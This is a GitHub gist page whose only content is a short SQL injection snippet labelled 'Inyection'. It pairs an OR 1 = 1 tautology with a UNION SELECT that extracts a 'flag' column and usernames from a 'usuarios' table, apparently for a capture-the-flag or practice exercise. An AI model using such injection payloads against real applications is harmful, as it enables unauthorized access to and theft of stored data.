Skip to content

Instantly share code, notes, and snippets.

@samuelloza
Created May 9, 2020 03:06
Show Gist options
  • Save samuelloza/de2bafbba3bffca98f2959a8f45013a7 to your computer and use it in GitHub Desktop.
Save samuelloza/de2bafbba3bffca98f2959a8f45013a7 to your computer and use it in GitHub Desktop.
//Inyection
select * from usuarios
where username = 1
OR 1 = 1
UNION SELECT flag, username FROM usuarios
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment